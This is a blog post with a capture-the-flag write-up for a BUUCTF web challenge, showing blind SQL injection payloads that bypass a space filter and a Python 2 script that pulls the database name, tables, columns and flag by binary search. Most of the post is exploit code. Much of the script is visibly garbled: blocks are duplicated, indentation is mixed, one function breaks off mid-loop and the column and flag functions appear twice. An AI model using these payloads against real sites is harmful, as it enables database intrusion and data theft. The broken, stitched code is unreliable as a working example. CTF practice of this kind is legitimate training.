BUUCTF-[WUSTCTF2020]颜值成绩查询

Analyze


Entering different numbers will return different scores.Suspected of SQL injection.

Judging by fuzzing that no special strings are filtered (except space).

Use dichotomy SQL injection.

payload like this:
?stunum=if((ascii(substr((select(database())),%d,1))>%d),1,0)"%(i,mid)
?stunum=if((ascii(substr((select(group_concat(table_name)from(information_schema.tables)where(table_schema=database_name))),%d,1))>%d),1,0)"%(i,mid)

exp:

It is worth mentioning that the flag is not in the 'flag' field but in the 'score' field.

import requests

url = "http://9947f438-fcd6-4b23-8a85-8ed0a71cf5c4.node3.buuoj.cn/"

#ctf
def database(url):
	name = ''
	for i in range(1,10000):
		low = 32
		high = 128
		mid = (low + high) / 2
		while low < high:
			payload = url + "?stunum=if((ascii(substr((select(database())),%d,1))>%d),1,0)"%(i,mid)
			r = requests.get(payload)
			if "admin" in r.text:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) / 2

		if mid == 32:
			break

		name = name + chr(mid)
		print "[*]" + name

#flag,score
def table(url):
	# select group_concat(table_name) from ...
	name = ''
	for i in range(1,10000):
		low = 32
		high = 128
		mid = (low + high) / 2
		while low < high:
			payload = url + "?stunum=if((ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),%d,1)))>%d,1,0)"%(i,mid)
			r = requests.get(payload)
			if "admin" in r.text:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) / 2
		if mid == 32:
        low = 32
        high = 128
        mid = (low + high) / 2
        while low < high:
            payload = url + "?stunum=if((ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),%d,1)))>%d,1,0)"%(i,mid)
            r = requests.get(payload)
            if "admin" in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) / 2
        if mid == 32:
            break
        name = name + chr(mid)
        print "[*]" + name

#flag value
def column(url):
    name = ''
    for i in range(1,10000):
        low = 32
        high = 128
        mid = (low + high) / 2
        while low < high:
            payload = url + "?stunum=if((ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),%d,1)))>%d,1,0)"%(i,mid)
            r = requests.get(payload)
            if "admin" in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) / 2
        if mid == 32:
            break
        name = name + chr(mid)
        print "[*]" + name

def flag(url):
    name = ''
    for i in range(1,10000):
        low = 32
        high = 128
        mid = (low + high) / 2
        while low < high:
            payload = url + "?stunum=if((ascii(substr((select(group_concat(value))from(ctf.flag)),%d,1)))>%d,1,0)"%(i,mid)
            r = requests.get(payload)
            if "admin" in r.text:
                low = mid + 1
            else:
                high = mid
			break
		name = name + chr(mid)
		print "[*]" + name

#flag value
def column(url):
	name = ''
	for i in range(1,10000):
		low = 32
		high = 128
		mid = (low + high) / 2
		while low < high:
			payload = url + "?stunum=if((ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),%d,1)))>%d,1,0)"%(i,mid)
			r = requests.get(payload)
			if "admin" in r.text:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) / 2
		if mid == 32:
			break
		name = name + chr(mid)
		print "[*]" + name

def flag(url):
	name = ''
	for i in range(1,10000):
		low = 32
		high = 128
		mid = (low + high) / 2
		while low < high:
			payload = url + "?stunum=if((ascii(substr((select(group_concat(value))from(ctf.flag)),%d,1)))>%d,1,0)"%(i,mid)
			r = requests.get(payload)
			if "admin" in r.text:
				low = mid + 1
			else:
				high = mid
			mid = (low + high) / 2
		if mid == 32:
			break
		name = name + chr(mid)
		print "[*]" + name

flag(url)
posted @ 2021-02-15 10:31  lemon想学二进制  阅读(50)  评论(0编辑  收藏